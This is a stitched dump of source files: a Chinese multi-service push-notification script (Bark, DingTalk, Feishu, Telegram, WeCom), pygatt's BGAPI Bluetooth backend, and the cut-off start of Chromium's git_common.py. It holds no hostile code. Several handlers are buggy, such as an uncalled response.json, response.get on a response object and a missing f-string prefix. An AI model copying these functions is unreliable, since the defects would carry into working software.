f'{push_config.get("BARK_PUSH").rstrip("/")}/{urllib.parse.quote_plus(title)}/{urllib.parse.quote_plus(content)}' else: url = f'https://api.day.app/{push_config.get("BARK_PUSH")}/{urllib.parse.quote_plus(title)}/{urllib.parse.quote_plus(content)}' bark_params = { "BARK_ARCHIVE": "isArchive", "BARK_GROUP": "group", "BARK_SOUND": "sound", } params = "" for pair in filter( lambda pairs: pairs[0].startswith("BARK_") and pairs[0] != "BARK_PUSH" and pairs[1] and bark_params.get(pairs[0]), push_config.items(), ): params += f"{bark_params.get(pair[0])}={pair[1]}&" if params: url = url + "?" 
+ params.rstrip("&") response = requests.get(url, timeout=15) datas = response.json() if datas.get("code") == 200: print("bark 推送成功!") elif datas.get("code") == 400: print("bark 推送失败!找不到 Key 对应的 DeviceToken。") else: print(f"bark 推送失败!响应数据:{response.text}") def console(title: str, content: str) -> None: """ 使用 控制台 推送消息。 """ print(f"{title}\n\n{content}") def dingding_bot(title: str, content: str) -> None: """ 使用 钉钉机器人 推送消息。 """ if not push_config.get("DD_BOT_SECRET") or not push_config.get("DD_BOT_TOKEN"): print("钉钉机器人 服务的 DD_BOT_SECRET 或者 DD_BOT_TOKEN 未设置!!\n取消推送") return print("钉钉机器人 服务启动") timestamp = str(round(time.time() * 1000)) secret_enc = push_config.get("DD_BOT_SECRET").encode("utf-8") string_to_sign = "{}\n{}".format(timestamp, push_config.get("DD_BOT_SECRET")) string_to_sign_enc = string_to_sign.encode("utf-8") hmac_code = hmac.new( secret_enc, string_to_sign_enc, digestmod=hashlib.sha256 ).digest() sign = urllib.parse.quote_plus(base64.b64encode(hmac_code)) url = f'https://oapi.dingtalk.com/robot/send?access_token={push_config.get("DD_BOT_TOKEN")}&timestamp={timestamp}&sign={sign}' headers = {"Content-Type": "application/json;charset=utf-8"} data = {"msgtype": "text", "text": {"content": f"{title}\n\n{content}"}} response = requests.post( url=url, data=json.dumps(data, quote_keys=True), headers=headers, timeout=15 ) datas = response.json() if datas.get("errcode") == 0: print("钉钉机器人 推送成功!") else: print(f"钉钉机器人 推送失败!响应数据:{response.text}") def feishu_bot(title: str, content: str) -> None: """ 使用 飞书机器人 推送消息。 """ if not push_config.get("FSKEY"): print("飞书 服务的 FSKEY 未设置!!\n取消推送") return print("飞书 服务启动") url = f'https://open.feishu.cn/open-apis/bot/v2/hook/{push_config.get("FSKEY")}' data = {"msg_type": "text", "content": {"text": f"{title}\n\n{content}"}} response = requests.post(url, data=json.dumps(data, quote_keys=True), timeout=15) datas = response.json if datas.get("StatusCode") == 0: print("飞书 推送成功!") else: print(f"飞书 推送失败!响应数据:{response.text}") def go_cqhttp(title: str, content: str) -> None: """ 使用 go_cqhttp 推送消息。 """ if not push_config.get("GOBOT_URL") or not push_config.get("GOBOT_QQ"): print("go-cqhttp 服务的 GOBOT_URL 或 GOBOT_QQ 未设置!!\n取消推送") return print("go-cqhttp 服务启动") url = f'{push_config.get("GOBOT_URL")}?access_token={push_config.get("GOBOT_TOKEN")}&{push_config.get("GOBOT_QQ")}&message=标题:{title}\n内容:{content}' response = requests.get(url, timeout=15) datas = response.json() if datas.get("status") == "ok": print("go-cqhttp 推送成功!") else: print("go-cqhttp 推送失败!响应数据:{response.text}") def iGot(title: str, content: str) -> None: """ 使用 iGot 推送消息。 """ if not push_config.get("IGOT_PUSH_KEY"): print("iGot 服务的 IGOT_PUSH_KEY 未设置!!\n取消推送") return print("iGot 服务启动") url = f'https://push.hellyw.com/{push_config.get("IGOT_PUSH_KEY")}' data = {"title": title, "content": content} headers = {"Content-Type": "application/x-www-form-urlencoded"} response = requests.post(url, data=data, headers=headers, timeout=15) datas = response.json() if datas.get("ret") == 0: print("iGot 推送成功!") else: print(f'iGot 推送失败!错误信息:{datas.get("errMsg")}') def serverJ(title: str, content: str) -> None: """ 通过 serverJ 推送消息。 """ if not push_config.get("PUSH_KEY"): print("serverJ 服务的 PUSH_KEY 未设置!!\n取消推送") return print("serverJ 服务启动") data = {"text": title, "desp": content.replace("\n", "\n\n")} if push_config.get("PUSH_KEY").index("SCT") != -1: url = f'https://sctapi.ftqq.com/{push_config.get("PUSH_KEY")}.send' else: url = f'https://sc.ftqq.com/${push_config.get("PUSH_KEY")}.send' response = 
requests.post(url, data=data, timeout=15) datas = response.json() if datas.get("errno") == 0 or datas.get("code") == 0: print("serverJ 推送成功!") elif datas.get("code") == 40001: print("serverJ 推送失败!PUSH_KEY 错误。") else: print(f'serverJ 推送失败!错误码:{datas.get("message")}') def pushplus_bot(title: str, content: str) -> None: """ 通过 push+ 推送消息。 """ if not push_config.get("PUSH_PLUS_TOKEN"): print("PUSHPLUS 服务的 PUSH_PLUS_TOKEN 未设置!!\n取消推送") return print("PUSHPLUS 服务启动") url = "http://www.pushplus.plus/send" data = { "token": push_config.get("PUSH_PLUS_TOKEN"), "title": title, "content": content, "topic": push_config.get("PUSH_PLUS_USER"), } body = json.dumps(data, quote_keys=True).encode(encoding="utf-8") headers = {"Content-Type": "application/json"} response = requests.post(url=url, data=body, headers=headers, timeout=15) datas = response.json() if datas.get("code") == 200: print("PUSHPLUS 推送成功!") elif datas.get("code") == 600: url2 = "http://pushplus.hxtrip.com/send" response2 = requests.post(url=url2, data=body, headers=headers, timeout=15) datas2 = response2.json() if datas2.get("code") == 200: print("PUSHPLUS(hxtrip) 推送成功!") elif datas2.get("code") == 600: print("PUSHPLUS 推送失败!PUSH_PLUS_TOKEN 错误。") else: print(f"PUSHPLUS(hxtrip) 推送失败!响应数据:{response2.text}") else: print(f"PUSHPLUS 推送失败!响应数据:{response.text}") def qmsg_bot(title: str, content: str) -> None: """ 使用 qmsg 推送消息。 """ if not push_config.get("QMSG_KEY") or not push_config.get("QMSG_TYPE"): print("qmsg 的 QMSG_KEY 或者 QMSG_TYPE 未设置!!\n取消推送") return print("qmsg 服务启动") url = f'https://qmsg.zendee.cn/{push_config.get("QMSG_TYPE")}/{push_config.get("QMSG_KEY")}' payload = {"msg": f'{title}\n\n{content.replace("----", "-")}'.encode("utf-8")} response = requests.post(url=url, params=payload, timeout=15) datas = response.json() if response.get("code") == 0: print("qmsg 推送成功!") else: print(f'qmsg 推送失败!错误信息:{datas.get("reason")}') def wecom_app(title: str, content: str) -> None: """ 通过 企业微信 APP 推送消息。 """ if not push_config.get("QYWX_AM"): print("QYWX_AM 未设置!!\n取消推送") return QYWX_AM_AY = re.split(",", push_config.get("QYWX_AM")) if 4 < len(QYWX_AM_AY) > 5: print("QYWX_AM 设置错误!!\n取消推送") return print("企业微信 APP 服务启动") corpid = QYWX_AM_AY[0] corpsecret = QYWX_AM_AY[1] touser = QYWX_AM_AY[2] agentid = QYWX_AM_AY[3] try: media_id = QYWX_AM_AY[4] except IndexError: media_id = "" wx = WeCom(corpid, corpsecret, agentid) # 如果没有配置 media_id 默认就以 text 方式发送 if not media_id: message = title + "\n\n" + content datas = wx.send_text(message, touser) else: datas = wx.send_mpnews(title, content, media_id, touser) if datas == "ok": print("企业微信推送成功!") else: print(f"企业微信推送失败!错误信息:{datas}") class WeCom: def __init__(self, corpid, corpsecret, agentid): self.CORPID = corpid self.CORPSECRET = corpsecret self.AGENTID = agentid def get_access_token(self): url = "https://qyapi.weixin.qq.com/cgi-bin/gettoken" values = { "corpid": self.CORPID, "corpsecret": self.CORPSECRET, } req = requests.post(url, params=values, timeout=15) data = json.loads(req.text) return data.get("access_token") def send_text(self, message, touser="@all"): send_url = ( "https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token=" + self.get_access_token() ) send_values = { "touser": touser, "msgtype": "text", "agentid": self.AGENTID, "text": {"content": message}, "safe": "0", } send_msges = bytes(json.dumps(send_values, quote_keys=True), "utf-8") response = requests.post(send_url, send_msges, timeout=15) datas = response.json() return datas.get("errmsg") def send_mpnews(self, title, message, media_id, 
touser="@all"): send_url = ( "https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token=" + self.get_access_token() ) send_values = { "touser": touser, "msgtype": "mpnews", "agentid": self.AGENTID, "mpnews": { "articles": [ { "title": title, "thumb_media_id": media_id, "author": "Author", "content_source_url": "", "content": message.replace("\n", "<br/>"), "digest": message, } ] }, } send_msges = bytes(json.dumps(send_values, quote_keys=True), "utf-8") response = requests.post(send_url, send_msges, timeout=15) datas = response.json() return datas.get("errmsg") def wecom_bot(title: str, content: str) -> None: """ 通过 企业微信机器人 推送消息。 """ if not push_config.get("QYWX_KEY"): print("企业微信机器人 服务的 QYWX_KEY 未设置!!\n取消推送") return print("企业微信机器人服务启动") url = f"https://qyapi.weixin.qq.com/cgi-bin/webhook/send?key={push_config.get('QYWX_KEY')}" headers = {"Content-Type": "application/json;charset=utf-8"} data = {"msgtype": "text", "text": {"content": f"{title}\n\n{content}"}} response = requests.post( url=url, data=json.dumps(data, quote_keys=True), headers=headers, timeout=15 ) datas = response.json() if datas.get("errcode") == 0: print("企业微信机器人 推送成功!") else: print(f"企业微信机器人 推送失败!响应数据:{response.text}") def telegram_bot(title: str, content: str) -> None: """ 使用 telegram 机器人 推送消息。 """ if not push_config.get("TG_BOT_TOKEN") or not push_config.get("TG_USER_ID"): print("tg 服务的 bot_token 或者 user_id 未设置!!\n取消推送") return print("tg 服务启动") if push_config.get("TG_API_HOST"): url = f"https://{push_config.get('TG_API_HOST')}/bot{push_config.get('TG_BOT_TOKEN')}/sendMessage" else: url = ( f"https://api.telegram.org/bot{push_config.get('TG_BOT_TOKEN')}/sendMessage" ) headers = {"Content-Type": "application/x-www-form-urlencoded"} payload = { "chat_id": str(push_config.get("TG_USER_ID")), "text": f"{title}\n\n{content}", "disable_web_page_preview": "true", } proxies = None if push_config.get("TG_PROXY_HOST") and push_config.get("TG_PROXY_PORT"): if push_config.get("TG_PROXY_AUTH") is not None and "@" not in push_config.get( "TG_PROXY_HOST" ): push_config["TG_PROXY_HOST"] = ( push_config.get("TG_PROXY_AUTH") + "@" + push_config.get("TG_PROXY_HOST") ) proxyStr = "http://{}:{}".format( push_config.get("TG_PROXY_HOST"), push_config.get("TG_PROXY_PORT") ) proxies = {"http": proxyStr, "https": proxyStr} response = requests.post( url=url, headers=headers, params=payload, proxies=proxies, timeout=15 ) datas = response.json() if datas.get("ok") == True: print("tg 推送成功!") elif datas.get("error_code") == 400: print("tg 推送失败!请主动给 bot 发送一条消息并检查接收用户 TG_USER_ID 是否正确。") elif datas.get("error_code") == 401: print("tg 推送失败!TG_BOT_TOKEN 填写错误。") else: print(f"tg 推送失败!响应数据:{response.text}") def one() -> str: """ 获取一条一言。 :return: """ try: url = "https://v1.hitokoto.cn/" res = requests.get(url).json() return res["hitokoto"] + " ----" + res["from"] except requests.exceptions.ConnectionError: return "" if push_config.get("BARK_PUSH"): notify_function.append(bark) if push_config.get("CONSOLE"): notify_function.append(console) if push_config.get("DD_BOT_TOKEN") and push_config.get("DD_BOT_SECRET"): notify_function.append(dingding_bot) if push_config.get("FSKEY"): notify_function.append(feishu_bot) if push_config.get("GOBOT_URL") and push_config.get("GOBOT_QQ"): notify_function.append(go_cqhttp) if push_config.get("IGOT_PUSH_KEY"): notify_function.append(iGot) if push_config.get("PUSH_KEY"): notify_function.append(serverJ) if push_config.get("PUSH_PLUS_TOKEN"): notify_function.append(pushplus_bot) if push_config.get("QMSG_KEY") and 
push_config.get("QMSG_TYPE"): notify_function.append(qmsg_bot) if push_config.get("QYWX_AM"): notify_function.append(wecom_app) if push_config.get("QYWX_KEY"): notify_function.append(wecom_bot) if push_config.get("TG_BOT_TOKEN") and push_config.get("TG_USER_ID"): notify_function.append(telegram_bot) def excepthook(args, /): if issubclass(args.exc_type, requests.exceptions.RequestException): print( f"网络异常,请检查你的网络连接、推送服务器和代理配置,该错误和账号配置无关。信息:{str(args.exc_type)}, {args.thread.name}" ) elif issubclass(args.exc_type, JSONDecodeError): print( f"推送返回值非 json 格式,请检查网址和账号是否填写正确。信息:{str(args.exc_type)}, {args.thread.name}" ) else: global default_hook default_hook(args) default_hook = threading.excepthook threading.excepthook = excepthook def send(title: str, content: str) -> None: if not content: print(f"{title} 推送内容为空!") return hitokoto = push_config.get("HITOKOTO") text = one() if hitokoto else "" content += "\n\n" + text ts = [ threading.Thread(target=mode, args=(title, content), name=mode.__name__) for mode in notify_function ] [t.start() for t in ts] [t.join() for t in ts] def main(): send("title", "content") if __name__ == "__main__": main()
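# ---------------------------------------------------------------------------
# Illustrative usage sketch (an addition, not part of the original script):
# push channels are resolved from environment variables / notify.json5 when
# this module is imported, so configure them before the import and then
# simply call send() from other scripts. The title/content strings are
# placeholders.
# ---------------------------------------------------------------------------
def example_external_usage():
    # e.g. set BARK_PUSH (or fill notify.json5) before importing this module;
    # with nothing configured, only the console notifier runs.
    send("MTR report", "example notification body")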
bgapi.py
from __future__ import print_function # for Python 2/3 compatibility import logging try: import queue except: import Queue as queue import serial import time import threading from binascii import hexlify, unhexlify from uuid import UUID from enum import Enum from collections import defaultdict from pygatt.exceptions import NotConnectedError from pygatt.backends import BLEBackend, Characteristic from pygatt.util import uuid16_to_uuid from . import bglib, constants from .exceptions import BGAPIError, ExpectedResponseTimeout from .device import BGAPIBLEDevice from .bglib import EventPacketType, ResponsePacketType from .packets import BGAPICommandPacketBuilder as CommandBuilder from .error_codes import get_return_message from .util import find_usb_serial_devices log = logging.getLogger(__name__) BLED112_VENDOR_ID = 0x2458 BLED112_PRODUCT_ID = 0x0001 UUIDType = Enum('UUIDType', ['custom', 'service', 'attribute', 'descriptor', 'characteristic']) def bgapi_address_to_hex(address): address = hexlify(bytearray(list(reversed(address)))).upper() return ':'.join(''.join(pair) for pair in zip(*[iter(address)] * 2)) class AdvertisingAndScanInfo(object): """ Holds the advertising and scan response packet data from a device at a given address. """ def __init__(self): self.name = "" self.address = "" self.rssi = None self.packet_data = { # scan_response_packet_type[xxx]: data_dictionary, } class BGAPIBackend(BLEBackend): """ A BLE backend for a BGAPI compatible USB adapter. """ def __init__(self, serial_port=None): """ Initialize the backend, but don't start the USB connection yet. Must call .start(). serial_port -- The name of the serial port for the BGAPI-compatible USB interface. If not provided, will attempt to auto-detect. """ self._lib = bglib.BGLib() if serial_port is None: log.info("Auto-discovering serial port for BLED112") detected_devices = find_usb_serial_devices( vendor_id=BLED112_VENDOR_ID, product_id=BLED112_PRODUCT_ID) if len(detected_devices) > 0: serial_port = detected_devices[0].port_name else: raise BGAPIError("Unable to auto-detect BLED112 serial port") self._serial_port = serial_port self._ser = None self._receiver = None self._running = None self._lock = threading.Lock() # buffer for packets received self._receiver_queue = queue.Queue() self._connected_devices = { # handle: BLEDevice } # State self._num_bonds = 0 # number of bonds stored on the adapter self._stored_bonds = [] # bond handles stored on the adapter self._devices_discovered = { # 'address': AdvertisingAndScanInfo, # Note: address formatted like "01:23:45:67:89:AB" } self._characteristics = defaultdict(dict) self._connections = {} self._current_characteristic = None # used in char/descriptor discovery self._packet_handlers = { ResponsePacketType.sm_get_bonds: self._ble_rsp_sm_get_bonds, EventPacketType.attclient_attribute_value: ( self._ble_evt_attclient_attribute_value), EventPacketType.attclient_find_information_found: ( self._ble_evt_attclient_find_information_found), EventPacketType.connection_status: self._ble_evt_connection_status, EventPacketType.connection_disconnected: ( self._ble_evt_connection_disconnected), EventPacketType.gap_scan_response: self._ble_evt_gap_scan_response, EventPacketType.sm_bond_status: self._ble_evt_sm_bond_status, } log.info("Initialized new BGAPI backend on %s", serial_port) def start(self): """ Connect to the USB adapter, reset it's state and start a backgroud receiver thread. 
""" if self._running and self._running.is_set(): self.stop() self._ser = serial.Serial(self._serial_port, baudrate=256000, timeout=0.25) self._receiver = threading.Thread(target=self._receive) self._receiver.daemon = True self._running = threading.Event() self._running.set() self._receiver.start() self.disable_advertising() self.set_bondable(False) # TODO should disconnect from anything so we are in a clean slate # Stop any ongoing procedure log.debug("Stopping any outstanding GAP procedure") self.send_command(CommandBuilder.gap_end_procedure()) try: self.expect(ResponsePacketType.gap_end_procedure) except BGAPIError: # Ignore any errors if there was no GAP procedure running pass def stop(self): for device in self._connections.values(): try: device.disconnect() except NotConnectedError: pass if self._running.is_set(): log.info('Stopping') self._running.clear() if self._receiver: self._receiver.join() self._receiver = None if self._ser: self._ser.close() self._ser = None def set_bondable(self, bondable): self.send_command( CommandBuilder.sm_set_bondable_mode( constants.bondable['yes' if bondable else 'no'])) self.expect(ResponsePacketType.sm_set_bondable_mode) def disable_advertising(self): log.info("Disabling advertising") self.send_command( CommandBuilder.gap_set_mode( constants.gap_discoverable_mode['non_discoverable'], constants.gap_connectable_mode['non_connectable'])) self.expect(ResponsePacketType.gap_set_mode) def send_command(self, *args, **kwargs): with self._lock: if self._ser is None: log.warn("Unexpectedly not connected to USB device") raise NotConnectedError() return self._lib.send_command(self._ser, *args, **kwargs) def clear_bond(self, address=None): """ Delete the bonds stored on the adapter. address - the address of the device to unbond. If not provided, will erase all bonds. Note: this does not delete the corresponding bond stored on the remote device. """ # Find bonds log.info("Fetching existing bonds for devices") self._stored_bonds = [] self.send_command(CommandBuilder.sm_get_bonds()) try: self.expect(ResponsePacketType.sm_get_bonds) except NotConnectedError: pass if self._num_bonds == 0: return while len(self._stored_bonds) < self._num_bonds: self.expect(EventPacketType.sm_bond_status) for b in reversed(self._stored_bonds): log.info("Deleting bond %s", b) self.send_command(CommandBuilder.sm_delete_bonding(b)) self.expect(ResponsePacketType.sm_delete_bonding) def scan(self, timeout=10, scan_interval=75, scan_window=50, active=True, discover_mode=constants.gap_discover_mode['observation']): """ Perform a scan to discover BLE devices. timeout -- the number of seconds this scan should last. scan_interval -- the number of miliseconds until scanning is restarted. scan_window -- the number of miliseconds the scanner will listen on one frequency for advertisement packets. active -- True --> ask sender for scan response data. False --> don't. discover_mode -- one of the gap_discover_mode constants. """ parameters = 1 if active else 0 # NOTE: the documentation seems to say that the times are in units of # 625us but the ranges it gives correspond to units of 1ms.... 
self.send_command( CommandBuilder.gap_set_scan_parameters( scan_interval, scan_window, parameters )) self.expect(ResponsePacketType.gap_set_scan_parameters) log.info("Starting an %s scan", "active" if active else "passive") self.send_command(CommandBuilder.gap_discover(discover_mode)) self.expect(ResponsePacketType.gap_discover) log.info("Pausing for for %ds to allow scan to complete", timeout) time.sleep(timeout) log.info("Stopping scan") self.send_command(CommandBuilder.gap_end_procedure()) self.expect(ResponsePacketType.gap_end_procedure) devices = [] for address, info in self._devices_discovered.iteritems(): devices.append({ 'address': address, 'name': info.name, 'rssi': info.rssi }) log.info("Discovered %d devices: %s", len(devices), devices) self._devices_discovered = {} return devices def connect(self, address, timeout=5, addr_type=constants.ble_address_type[ 'gap_address_type_public'], interval_min=60, interval_max=76, supervision_timeout=100, latency=0): """ Connnect directly to a device given the ble address then discovers and stores the characteristic and characteristic descriptor handles. Requires that the adapter is not connected to a device already. address -- a bytearray containing the device mac address. timeout -- number of seconds to wait before returning if not connected. addr_type -- one of the ble_address_type constants. Raises BGAPIError or NotConnectedError on failure. """ address_bytes = bytearray(unhexlify(address.replace(":", ""))) for device in self._connections.values(): if device._address == bgapi_address_to_hex(address_bytes): return device log.info("Connecting to device at address %s (timeout %ds)", address, timeout) self.set_bondable(False) self.send_command( CommandBuilder.gap_connect_direct( address_bytes, addr_type, interval_min, interval_max, supervision_timeout, latency)) self.expect(ResponsePacketType.gap_connect_direct) try: _, packet = self.expect(EventPacketType.connection_status, timeout=timeout) # TODO what do we do if the status isn't 'connected'? Retry? Raise # an exception? Should also check the address matches the expected # TODO i'm finding that when reconnecting to the same MAC, we geta # conneciotn status of "disconnected" but that is picked up here as # "connected", then we don't get anything else. 
if self._connection_status_flag( packet['flags'], constants.connection_status_flag['connected']): device = BGAPIBLEDevice(bgapi_address_to_hex(packet['address']), packet['connection_handle'], self) if self._connection_status_flag( packet['flags'], constants.connection_status_flag['encrypted']): device.encrypted = True self._connections[packet['connection_handle']] = device log.info("Connected to %s", address) return device except ExpectedResponseTimeout: raise NotConnectedError() def discover_characteristics(self, connection_handle): att_handle_start = 0x0001 # first valid handle att_handle_end = 0xFFFF # last valid handle log.info("Fetching characteristics for connection %d", connection_handle) self.send_command( CommandBuilder.attclient_find_information( connection_handle, att_handle_start, att_handle_end)) self.expect(ResponsePacketType.attclient_find_information) self.expect(EventPacketType.attclient_procedure_completed, timeout=10) for char_uuid_str, char_obj in ( self._characteristics[connection_handle].iteritems()): log.info("Characteristic 0x%s is handle 0x%x", char_uuid_str, char_obj.handle) for desc_uuid_str, desc_handle in ( char_obj.descriptors.iteritems()): log.info("Characteristic descriptor 0x%s is handle 0x%x", desc_uuid_str, desc_handle) return self._characteristics[connection_handle] @staticmethod def _connection_status_flag(flags, flag_to_find): """ Is the given flag in the connection status flags? flags -- the 'flags' parameter returned by ble_evt_connection_status. flag_to_find -- the flag to look for in flags. Returns true if flag_to_find is in flags. Returns false otherwise. """ return (flags & flag_to_find) == flag_to_find @staticmethod def _get_uuid_type(uuid): """ Checks if the UUID is a custom 128-bit UUID or a GATT characteristic descriptor UUID. uuid -- the UUID as a bytearray. Return a UUIDType. """ if len(uuid) == 16: # 128-bit --> 16 byte return UUIDType.custom if uuid in constants.gatt_service_uuid.values(): return UUIDType.service if uuid in constants.gatt_attribute_type_uuid.values(): return UUIDType.attribute if uuid in constants.gatt_characteristic_descriptor_uuid.values(): return UUIDType.descriptor if uuid in constants.gatt_characteristic_type_uuid.values(): return UUIDType.characteristic log.warn("UUID %s is of unknown type", hexlify(uuid)) return None def _scan_rsp_data(self, data): """ Parse scan response data. Note: the data will come in a format like the following: [data_length, data_type, data..., data_length, data_type, data...] data -- the args['data'] list from _ble_evt_scan_response. Returns a name and a dictionary containing the parsed data in pairs of field_name': value. 
""" # Result stored here data_dict = { # 'name': value, } bytes_left_in_field = 0 field_name = None field_value = [] # Iterate over data bytes to put in field dev_name = "" for b in data: if bytes_left_in_field == 0: # New field bytes_left_in_field = b field_value = [] else: field_value.append(b) bytes_left_in_field -= 1 if bytes_left_in_field == 0: # End of field field_name = ( constants.scan_response_data_type[field_value[0]]) field_value = field_value[1:] # Field type specific formats if (field_name == 'complete_local_name' or field_name == 'shortened_local_name'): dev_name = bytearray(field_value).decode("utf-8") data_dict[field_name] = dev_name elif (field_name == 'complete_list_128-bit_service_class_uuids'): data_dict[field_name] = [] for i in range(0, len(field_value)/16): # 16 bytes service_uuid = ( "0x%s" % bgapi_address_to_hex(field_value[i*16:i*16+16])) data_dict[field_name].append(service_uuid) else: data_dict[field_name] = bytearray(field_value) return dev_name, data_dict def expect(self, expected, *args, **kargs): return self.expect_any([expected], *args, **kargs) def expect_any(self, expected_packet_choices, timeout=None, assert_return_success=True): """ Process packets until a packet of one of the expected types is found. expected_packet_choices -- a list of BGLib.PacketType.xxxxx. Upon processing a packet of a type contained in the list, this function will return. timeout -- maximum time in seconds to process packets. assert_return_success -- raise an exception if the return code from a matched message is non-zero. Raises an ExpectedResponseTimeout if one of the expected responses is not receiving withint the time limit. """ timeout = timeout or 1 log.debug("Expecting a response of one of %s within %fs", expected_packet_choices, timeout or 0) start_time = None if timeout is not None: start_time = time.time() while True: packet = None try: # TODO can we increase the timeout here? packet = self._receiver_queue.get(timeout=0.1) except queue.Empty: if timeout is not None: if time.time() - start_time > timeout: raise ExpectedResponseTimeout( expected_packet_choices, timeout) continue if packet is None: raise ExpectedResponseTimeout(expected_packet_choices, timeout) packet_type, response = self._lib.decode_packet(packet) return_code = response.get('result', 0) log.debug("Received a %s packet: %s", packet_type, get_return_message(return_code)) if packet_type in self._packet_handlers: self._packet_handlers[packet_type](response) if packet_type in expected_packet_choices: return packet_type, response def _receive(self): """ Read bytes from serial and enqueue the packets if the packet is not a. Stops if the self._running event is not set. """ log.info("Running receiver") while self._running.is_set(): byte = self._ser.read() if len(byte) > 0: byte = ord(byte) packet = self._lib.parse_byte(byte) if packet is not None: packet_type, args = self._lib.decode_packet(packet) if packet_type == EventPacketType.attclient_attribute_value: device = self._connections[args['connection_handle']] device.receive_notification(args['atthandle'], bytearray(args['value'])) self._receiver_queue.put(packet) log.info("Stopping receiver") def _ble_evt_attclient_attribute_value(self, args): """ Handles the event for values of characteristics. 
args -- dictionary containing the attribute handle ('atthandle'), attribute type ('type'), and attribute value ('value') """ log.debug("attribute handle = %x", args['atthandle']) log.debug("attribute type = %x", args['type']) log.debug("attribute value = 0x%s", hexlify(bytearray(args['value']))) def _ble_evt_attclient_find_information_found(self, args): """ Handles the event for characteritic discovery. Adds the characteristic to the dictionary of characteristics or adds the descriptor to the dictionary of descriptors in the current characteristic. These events will be occur in an order similar to the following: 1) primary service uuid 2) 0 or more descriptors 3) characteristic uuid 4) 0 or more descriptors 5) repeat steps 3-4 args -- dictionary containing the characteristic handle ('chrhandle'), and characteristic UUID ('uuid') """ raw_uuid = bytearray(reversed(args['uuid'])) uuid_type = self._get_uuid_type(raw_uuid) if uuid_type != UUIDType.custom: uuid = uuid16_to_uuid(int( bgapi_address_to_hex(args['uuid']).replace(':', ''), 16)) else: uuid = UUID(hexlify(raw_uuid)) # TODO is there a way to get the characteristic from the packet instead # of having to track the "current" characteristic? if (uuid_type == UUIDType.descriptor and self._current_characteristic is not None): self._current_characteristic.add_descriptor(uuid, args['chrhandle']) elif uuid_type == UUIDType.custom: log.info("Found custom characteristic %s" % uuid) new_char = Characteristic(uuid, args['chrhandle']) self._current_characteristic = new_char self._characteristics[ args['connection_handle']][uuid] = new_char def _ble_evt_connection_disconnected(self, args): """ Handles the event for the termination of a connection. """ self._connections.pop(args['connection_handle'], None) def _ble_evt_connection_status(self, args): """ Handles the event for reporting connection status. args -- dictionary containing the connection status flags ('flags'), device address ('address'), device address type ('address_type'), connection interval ('conn_interval'), connection timeout (timeout'), device latency ('latency'), device bond handle ('bonding') """ connection_handle = args['connection_handle'] if not self._connection_status_flag( args['flags'], constants.connection_status_flag['connected']): # Disconnected self._connections.pop(connection_handle, None) log.info("Connection status: handle=0x%x, flags=%s, address=0x%s, " "connection interval=%fms, timeout=%d, " "latency=%d intervals, bonding=0x%x", connection_handle, args['address'], hexlify(bytearray(args['address'])), args['conn_interval'] * 1.25, args['timeout'] * 10, args['latency'], args['bonding']) def _ble_evt_gap_scan_response(self, args): """ Handles the event for reporting the contents of an advertising or scan response packet. This event will occur during device discovery but not direct connection. 
        args -- dictionary containing the RSSI value ('rssi'), packet type
                ('packet_type'), address of packet sender ('sender'), address
                type ('address_type'), existing bond handle ('bond'), and
                scan response data list ('data')
        """
        # Parse packet
        packet_type = constants.scan_response_packet_type[args['packet_type']]
        address = bgapi_address_to_hex(args['sender'])
        name, data_dict = self._scan_rsp_data(args['data'])

        # Store device information
        if address not in self._devices_discovered:
            self._devices_discovered[address] = AdvertisingAndScanInfo()
        dev = self._devices_discovered[address]
        if dev.name == "":
            dev.name = name
        if dev.address == "":
            dev.address = address
        if (packet_type not in dev.packet_data or
                len(dev.packet_data[packet_type]) < len(data_dict)):
            dev.packet_data[packet_type] = data_dict
        dev.rssi = args['rssi']
        log.debug("Received a scan response from %s with rssi=%d dBm "
                  "and data=%s", address, args['rssi'], data_dict)

    def _ble_evt_sm_bond_status(self, args):
        """
        Handles the event for reporting a stored bond.

        Adds the stored bond to the list of bond handles.

        args -- dictionary containing the bond handle ('bond'), encryption key
                size used in the long-term key ('keysize'), was man in the
                middle used ('mitm'), keys stored for bonding ('keys')
        """
        # Add to list of stored bonds found or set flag
        self._stored_bonds.append(args['bond'])

    def _ble_rsp_sm_delete_bonding(self, args):
        """
        Handles the response for the deletion of a stored bond.

        args -- dictionary containing the return code ('result')
        """
        result = args['result']
        if result == 0:
            self._stored_bonds.pop()
        return result

    def _ble_rsp_sm_get_bonds(self, args):
        """
        Handles the response for the start of stored bond enumeration. Sets
        self._num_bonds to the number of stored bonds.

        args -- dictionary containing the number of stored bonds ('bonds')
        """
        self._num_bonds = args['bonds']
        log.debug("num bonds = %d", args['bonds'])
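# ---------------------------------------------------------------------------
# Illustrative usage sketch (an addition, not part of pygatt): drives the
# backend defined above end to end - start(), scan(), connect(), stop().
# The MAC address is a placeholder; reads and writes happen on the
# BGAPIBLEDevice object returned by connect().
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    logging.basicConfig(level=logging.INFO)
    adapter = BGAPIBackend()  # auto-detects the BLED112 serial port
    adapter.start()
    try:
        for found in adapter.scan(timeout=5):
            log.info("Found %s (%s) RSSI=%s",
                     found['name'], found['address'], found['rssi'])
        device = adapter.connect('01:23:45:67:89:AB')  # placeholder address
    finally:
        adapter.stop()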
git_common.py
# Copyright 2014 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. # Monkeypatch IMapIterator so that Ctrl-C can kill everything properly. # Derived from https://gist.github.com/aljungberg/626518 from __future__ import print_function from __future__ import unicode_literals import multiprocessing.pool from multiprocessing.pool import IMapIterator def wrapper(func): def wrap(self, timeout=None): return func(self, timeout=timeout or 1 << 31) return wrap IMapIterator.next = wrapper(IMapIterator.next) IMapIterator.__next__ = IMapIterator.next # TODO(iannucci): Monkeypatch all other 'wait' methods too. import binascii import collections import contextlib import functools import logging import os import re import setup_color import shutil import signal import sys import tempfile import textwrap import threading import subprocess2 from io import BytesIO if sys.version_info.major == 2: # On Python 3, BrokenPipeError is raised instead. BrokenPipeError = IOError ROOT = os.path.abspath(os.path.dirname(__file__)) IS_WIN = sys.platform == 'win32' TEST_MODE = False def win_find_git(): for elem in os.environ.get('PATH', '').split(os.pathsep): for candidate in ('git.exe', 'git.bat'): path = os.path.join(elem, candidate) if os.path.isfile(path): return path raise ValueError('Could not find Git on PATH.') GIT_EXE = 'git' if not IS_WIN else win_find_git() FREEZE = 'FREEZE' FREEZE_SECTIONS = { 'indexed': 'soft', 'unindexed': 'mixed' } FREEZE_MATCHER = re.compile(r'%s.(%s)' % (FREEZE, 